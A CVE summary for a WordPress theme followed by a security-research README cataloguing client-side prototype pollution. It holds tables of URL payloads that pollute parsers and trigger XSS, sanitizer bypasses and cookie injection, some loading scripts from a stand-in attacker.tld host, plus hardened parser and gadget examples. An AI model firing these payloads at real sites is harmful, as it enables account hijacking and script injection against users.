CVE-2023-3933: GitHub - BlackFan/client-side-prototype-pollution: Prototype Pollution and useful Script Gadgets

The Your Journey theme for WordPress is vulnerable to Reflected Cross-Site Scripting via prototype pollution in versions up to, and including, 1.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
# Client-Side Prototype Pollution

## Intro
If you are unfamiliar with Prototype Pollution attacks, read the following first:

- JavaScript prototype pollution attack in NodeJS by Olivier Arteau
- Prototype pollution – and bypassing client-side HTML sanitizers by Michał Bentkowski

In this repository, I collect examples of libraries that are vulnerable to Prototype Pollution because they parse document.location (the query string or the hash) into nested objects without rejecting keys such as `__proto__` and `constructor`, together with script gadgets: library code that reads configuration from an object and therefore picks up the polluted property, which can be used to demonstrate the impact (XSS, sanitizer bypass, cookie injection).
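The parsing bug behind the first table, as an added example that is not code from this repository or from any of the libraries it lists: a minimal deparam-style parser (`deparamVulnerable`, `deparamSafe`, `pollutes` and `report` are names chosen here) that turns `a[b][c]` and `a.b.c` keys into nested objects, first in the vulnerable form the listed libraries share and then hardened, plus a check that runs the generic payloads from the table against either parser.

```javascript
// Added example, not code from the BlackFan repository or from any listed library.
// A minimal deparam-style query/hash parser, vulnerable and hardened, with a check.

// "a[b][c]" or "a.b.c" -> ["a", "b", "c"], as jquery-deparam-style parsers do.
function keyPath(rawKey) {
  return rawKey.replace(/\]/g, '').split(/\[|\./).filter(Boolean);
}

// "?k=v&k2=v2" -> [[path, value], ...]; leading "?" or "#" is stripped.
function pairs(query) {
  return query
    .replace(/^[?#]/, '')
    .split('&')
    .filter(Boolean)
    .map((pair) => {
      const eq = pair.indexOf('=');
      const rawKey = eq === -1 ? pair : pair.slice(0, eq);
      const rawValue = eq === -1 ? '' : pair.slice(eq + 1);
      return [keyPath(decodeURIComponent(rawKey)), decodeURIComponent(rawValue)];
    })
    .filter(([path]) => path.length > 0);
}

// VULNERABLE: walks the key path with plain property access. For
// "__proto__[test]=test" the first step lands on Object.prototype; for
// "constructor[prototype][test]=test" it goes Object -> Object.prototype.
// Either way the final assignment pollutes every object in the page.
function deparamVulnerable(query) {
  const result = {};
  for (const [path, value] of pairs(query)) {
    let cursor = result;
    for (let i = 0; i < path.length - 1; i++) {
      if (cursor[path[i]] === undefined) cursor[path[i]] = {};
      cursor = cursor[path[i]];
    }
    cursor[path[path.length - 1]] = value;
  }
  return result;
}

// HARDENED: null-prototype containers (nothing to walk into) plus a deny-list
// for the keys the payloads use, so the whole offending pair is dropped.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function deparamSafe(query) {
  const result = Object.create(null);
  for (const [path, value] of pairs(query)) {
    if (path.some((key) => FORBIDDEN_KEYS.has(key))) continue;
    let cursor = result;
    for (let i = 0; i < path.length - 1; i++) {
      if (cursor[path[i]] === undefined) cursor[path[i]] = Object.create(null);
      cursor = cursor[path[i]];
    }
    cursor[path[path.length - 1]] = value;
  }
  return result;
}

// Check: parse the payload, then ask a fresh object whether it now sees `test`.
// Object.prototype is cleaned afterwards so one check cannot influence the next.
function pollutes(parser, payload) {
  parser(payload);
  const seen = ({}).test;
  delete Object.prototype.test;
  return seen === 'test';
}

// The generic payload shapes from the table (constructed here for the check).
const PAYLOADS = [
  '?__proto__[test]=test',
  '?__proto__.test=test',
  '?constructor[prototype][test]=test',
  '?constructor.prototype.test=test',
];

// { payload: true|false } for each payload shape against the given parser.
function report(parser) {
  return Object.fromEntries(PAYLOADS.map((p) => [p, pollutes(parser, p)]));
}

console.log(report(deparamVulnerable)); // every payload -> true
console.log(report(deparamSafe));       // every payload -> false
```

On a live page the same check is to load it with one of the payloads and evaluate `Object.prototype.test` (or `({}).test`) in the console; a value of `"test"` means the page's parser is on the list. Note that the deny-list alone is not enough if the parser later merges the result into a normal object with a recursive merge, which is why the hardened version also uses null-prototype containers.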
## Prototype Pollution

| Name | Payload | Refs | Found by |
|---|---|---|---|
| Wistia Embedded Video (Fixed) | `?__proto__[test]=test`<br>`?__proto__.test=test` | [1] | William Bowling |
| jQuery query-object plugin<br>CVE-2021-20083 | `?__proto__[test]=test`<br>`#__proto__[test]=test` | | Sergey Bobrov |
| jQuery Sparkle<br>CVE-2021-20084 | `?__proto__.test=test`<br>`?constructor.prototype.test=test` | | Sergey Bobrov |
| V4Fire Core Library | `?__proto__.test=test`<br>`?__proto__[test]=test`<br>`?__proto__[test]={"json":"value"}` | | Sergey Bobrov |
| backbone-query-parameters<br>CVE-2021-20085 | `?__proto__.test=test`<br>`?constructor.prototype.test=test`<br>`?__proto__.array=1\|2\|3` | [1] | Sergey Bobrov |
| jQuery BBQ<br>CVE-2021-20086 | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | | Sergey Bobrov |
| jquery-deparam<br>CVE-2021-20087 | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | | Sergey Bobrov |
| MooTools More<br>CVE-2021-20088 | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | | Sergey Bobrov |
| Swiftype Site Search (Fixed) | `#__proto__[test]=test` | [1] | s1r1us |
| CanJS deparam | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | | Rahul Maini |
| Purl (jQuery-URL-Parser)<br>CVE-2021-20089 | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test`<br>`#__proto__[test]=test` | | Sergey Bobrov |
| HubSpot Tracking Code (Fixed) | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test`<br>`#__proto__[test]=test` | | Sergey Bobrov |
| YUI 3 querystring-parse | `?constructor[prototype][test]=test` | | Sergey Bobrov |
| Mutiny (Fixed) | `?__proto__.test=test` | | SPQR |
| jQuery parseParams | `?__proto__.test=test`<br>`?constructor.prototype.test=test` | | POSIX |
| php.js parse_str | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | | POSIX |
| arg.js | `?__proto__[test]=test`<br>`?__proto__.test=test`<br>`?constructor[prototype][test]=test`<br>`#__proto__[test]=test` | | POSIX |
| davis.js | `?__proto__[test]=test` | | POSIX |
| Component querystring | `?__proto__[NUMBER]=test`<br>`?__proto__[123]=test` | | Masato Kinugawa |
| Aurelia path | `?__proto__[test]=test` | [1] | s1r1us |
| analytics-utils < 1.0.3 | `?__proto__[test]=test`<br>`?constructor[prototype][test]=test` | [1] | alexdaviestray |
## Script Gadgets

| Name | Payload | Impact | Refs | Found by |
|---|---|---|---|---|
| Wistia Embedded Video | `?__proto__[innerHTML]=<img/src/onerror%3dalert(1)>` | XSS | [1] | William Bowling |
| jQuery $.get | `?__proto__[context]=<img/src/onerror%3dalert(1)>`<br>`&__proto__[jquery]=x` | XSS | | Sergey Bobrov |
| jQuery $.get >= 3.0.0<br>Boolean.prototype | `?__proto__[url][]=data:,alert(1)//`<br>`&__proto__[dataType]=script` | XSS | | Michał Bentkowski |
| jQuery $.get >= 3.0.0<br>Boolean.prototype | `?__proto__[url]=data:,alert(1)//`<br>`&__proto__[dataType]=script`<br>`&__proto__[crossDomain]=` | XSS | | Sergey Bobrov |
| jQuery $.getScript >= 3.4.0 | `?__proto__[src][]=data:,alert(1)//` | XSS | | s1r1us |
| jQuery $.getScript 3.0.0 - 3.3.1<br>Boolean.prototype | `?__proto__[url]=data:,alert(1)//` | XSS | | s1r1us |
| jQuery $(html) | `?__proto__[div][0]=1`<br>`&__proto__[div][1]=<img/src/onerror%3dalert(1)>` | XSS | | Sergey Bobrov |
| jQuery $(x).off<br>String.prototype | `?__proto__[preventDefault]=x`<br>`&__proto__[handleObj]=x`<br>`&__proto__[delegateTarget]=<img/src/onerror%3dalert(1)>` | XSS | | Sergey Bobrov |
| Google reCAPTCHA | `?__proto__[srcdoc][]=<script>alert(1)</script>` | XSS | | s1r1us |
| Twitter Universal Website Tag (Fixed) | `?__proto__[hif][]=javascript:alert(1)` | XSS | | Sergey Bobrov |
| Tealium Universal Tag | `?__proto__[attrs][src]=1`<br>`&__proto__[src]=data:,alert(1)//` | XSS | | Sergey Bobrov |
| Akamai Boomerang | `?__proto__[BOOMR]=1`<br>`&__proto__[url]=//attacker.tld/js.js` | XSS | | s1r1us |
| Lodash <= 4.17.15 | `?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1)` | XSS | [1] | Alex Brasetvik |
| sanitize-html | `?__proto__[*][]=onload` | Bypass | [1] | Michał Bentkowski |
| sanitize-html | `?__proto__[innerText]=<script>alert(1)</script>` | Bypass | [1] | Hpdoger |
| js-xss | `?__proto__[whiteList][img][0]=onerror`<br>`&__proto__[whiteList][img][1]=src` | Bypass | [1] | Michał Bentkowski |
| DOMPurify <= 2.0.12 | `?__proto__[ALLOWED_ATTR][0]=onerror`<br>`&__proto__[ALLOWED_ATTR][1]=src` | Bypass | [1] | Michał Bentkowski |
| DOMPurify <= 2.0.12 | `?__proto__[documentMode]=9` | Bypass | [1] | Michał Bentkowski |
| Google Closure | `?__proto__[%20ONERROR]=1`<br>`&__proto__[%20SRC]=1` | Bypass | [1] | Michał Bentkowski |
| Google Closure | `?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//` | XSS | [1] | Michał Bentkowski |
| Marionette.js / Backbone.js | `?__proto__[tagName]=img`<br>`&__proto__[src][]=x:`<br>`&__proto__[onerror][]=alert(1)` | XSS | | Sergey Bobrov |
| Adobe Dynamic Tag Management | `?__proto__[src]=data:,alert(1)//` | XSS | | Sergey Bobrov |
| Adobe Dynamic Tag Management | `?__proto__[SRC]=<img/src/onerror%3dalert(1)>` | XSS | | Sergey Bobrov |
| Swiftype Site Search | `?__proto__[xxx]=alert(1)` | XSS | | s1r1us |
| Embedly Cards | `?__proto__[onload]=alert(1)` | XSS | | Guilherme Keerok |
| Segment Analytics.js | `?__proto__[script][0]=1`<br>`&__proto__[script][1]=<img/src/onerror%3dalert(1)>` | XSS | | Sergey Bobrov |
| Knockout.js<br>Array.prototype | `?__proto__[4]=a':1,[alert(1)]:1,'b`<br>`&__proto__[5]=,` | XSS | | Michał Bentkowski |
| Zepto.js | `?__proto__[onerror]=alert(1)` | XSS | [1] | lih3iu |
| Zepto.js | `?__proto__[html]=<img/src/onerror%3dalert(1)>` | XSS | | Sergey Bobrov |
| Sprint.js | `?__proto__[div][intro]=<img%20src%20onerror%3dalert(1)>` | XSS | [1] | lih3iu |
| Vue.js | `?__proto__[v-if]=_c.constructor('alert(1)')()` | XSS | | POSIX |
| Vue.js | `?__proto__[attrs][0][name]=src`<br>`&__proto__[attrs][0][value]=xxx`<br>`&__proto__[xxx]=data:,alert(1)//`<br>`&__proto__[is]=script` | XSS | [1] | s1r1us |
| Vue.js | `?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()` | XSS | [1] | r00timentary |
| Vue.js | `?__proto__[data]=a`<br>`&__proto__[template][nodeType]=a`<br>`&__proto__[template][innerHTML]=<script>alert(1)</script>` | XSS | [1] | SuperGuesser |
| Vue.js | `?__proto__[props][][value]=a`<br>`&__proto__[name]=":''.constructor.constructor('alert(1)')(),"` | XSS | [1] | st98_ |
| Vue.js | `?__proto__[template]=<script>alert(1)</script>` | XSS | [1] | huli |
| Demandbase Tag | `?__proto__[Config][SiteOptimization][enabled]=1`<br>`&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?` | XSS | | SPQR |
| @analytics/google-tag-manager | `?__proto__[customScriptSrc]=//attacker.tld/xss.js` | XSS | | SPQR |
| i18next | `?__proto__[lng]=cimode`<br>`&__proto__[appendNamespaceToCIMode]=x`<br>`&__proto__[nsSeparator]=<img/src/onerror%3dalert(1)>` | Potential XSS | | Sergey Bobrov |
| i18next < 19.8.5 | `?__proto__[lng]=a`<br>`&__proto__[a]=b`<br>`&__proto__[obj]=c`<br>`&__proto__[k]=d`<br>`&__proto__[d]=<img/src/onerror%3dalert(1)>` | Potential XSS | | Sergey Bobrov |
| i18next >= 19.8.5 | `?__proto__[lng]=a`<br>`&__proto__[key]=<img/src/onerror%3dalert(1)>` | Potential XSS | | Sergey Bobrov |
| Google Analytics | `?__proto__[cookieName]=COOKIE%3DInjection%3B` | Cookie Injection | | Sergey Bobrov |
| Popper.js | `?__proto__[arrow][style]=color:red;transition:all%201s`<br>`&__proto__[arrow][ontransitionend]=alert(1)`<br>`?__proto__[reference][style]=color:red;transition:all%201s`<br>`&__proto__[reference][ontransitionend]=alert(2)`<br>`?__proto__[popper][style]=color:red;transition:all%201s`<br>`&__proto__[popper][ontransitionend]=alert(3)` | XSS | [1] [2] | Matheus Vrech |
| Pendo Agent | `?__proto__[dataHost]=attacker.tld/js.js%23` | XSS | | Renwa |
| script.aculo.us<br>String.constructor | `?x=x`<br>`&x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)>` | XSS | | Sergey Bobrov |
| hCaptcha (Fixed) | `?__proto__[assethost]=javascript:alert(1)//` | XSS | | Masato Kinugawa |
| Google Closure | `?__proto__[trustedTypes]=x`<br>`&__proto__[emptyHTML]=<img/src/onerror%3dalert(1)>` | XSS | | Mathias Karlsson |
| Google Tag Manager | `?__proto__[vtp_enableRecaptcha]=1`<br>`&__proto__[srcdoc]=<script>alert(1)</script>` | XSS | | terjanq |
| Google Tag Manager | `?__proto__[q][0][0]=require`<br>`&__proto__[q][0][1]=x`<br>`&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7` | XSS | | Sergey Bobrov / Masato Kinugawa |
| Google Analytics | `?__proto__[q][0][0]=require`<br>`&__proto__[q][0][1]=x`<br>`&__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7` | XSS | | Sergey Bobrov / Masato Kinugawa |
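Why a gadget turns a polluted prototype into XSS, as an added example that is not code from this repository or from any listed library: a stand-in for a third-party embed script (`renderEmbedVulnerable`, `renderEmbedSafe`, `MockElement` and `withPollution` are names chosen here) reads `tagName`, `src` and `innerHTML` from an options object the page never populated, so the lookups fall through to `Object.prototype` in the same way the `__proto__[innerHTML]`, `__proto__[src]` and `__proto__[tagName]` payloads above depend on. A mock element stands in for the DOM, and the pollution is applied directly by a helper that restores `Object.prototype` afterwards; in a real attack it comes from one of the parsers in the first table.

```javascript
// Added example, not code from the BlackFan repository or from any listed library.
// A gadget-style embed function, its hardened form, and a mock element so the
// effect can be observed without a browser. Real browsers would parse the HTML
// assigned below and run the onerror handler; the mock only records the string.

class MockElement {
  constructor(tagName) {
    this.tagName = tagName;
    this.attributes = Object.create(null); // null prototype: no fall-through here
    this.html = '';
  }
  setAttribute(name, value) {
    this.attributes[name] = String(value);
  }
}

// VULNERABLE (gadget): every lookup is a plain property read with a truthiness
// check, so an option that was never set is taken from Object.prototype.
function renderEmbedVulnerable(options = {}) {
  const el = new MockElement(options.tagName || 'div');
  if (options.src) el.setAttribute('src', options.src);
  if (options.innerHTML) el.html = options.innerHTML;
  return el;
}

// HARDENED: only own properties count, and defaults live in a null-prototype
// object so they cannot be shadowed by pollution either.
// Object.hasOwn is ES2022; use Object.prototype.hasOwnProperty.call on older runtimes.
const DEFAULTS = Object.assign(Object.create(null), { tagName: 'div' });

function own(options, key) {
  return Object.hasOwn(options, key) ? options[key] : DEFAULTS[key];
}

function renderEmbedSafe(options = {}) {
  const el = new MockElement(own(options, 'tagName'));
  const src = own(options, 'src');
  if (src !== undefined) el.setAttribute('src', src);
  const html = own(options, 'innerHTML');
  if (html !== undefined) el.html = html;
  return el;
}

// Simulates what a vulnerable parser does with ?__proto__[key]=value for each
// entry, runs fn, then removes the properties again so the pollution does not
// leak into the rest of the process.
function withPollution(pollution, fn) {
  for (const [key, value] of Object.entries(pollution)) Object.prototype[key] = value;
  try {
    return fn();
  } finally {
    for (const key of Object.keys(pollution)) delete Object.prototype[key];
  }
}

// Constructed from the Wistia and Marionette/Backbone rows of the table above.
const PAYLOAD = '<img/src/onerror=alert(1)>';

// Renders with an empty options object (the page itself passed nothing) while
// Object.prototype carries the attacker's values; returns both elements.
function demo() {
  const pollution = { innerHTML: PAYLOAD, tagName: 'img', src: 'x:' };
  return withPollution(pollution, () => ({
    vulnerable: renderEmbedVulnerable({}),
    safe: renderEmbedSafe({}),
  }));
}

const result = demo();
console.log(result.vulnerable); // tagName 'img', src 'x:', html = PAYLOAD
console.log(result.safe);       // tagName 'div', no src, empty html
```

The same own-property discipline is what the "Fixed" entries in the tables amount to on the consumer side; a library cannot control which query-string parser the host page loads, so the gadget has to stop trusting inherited properties rather than rely on the parser being fixed.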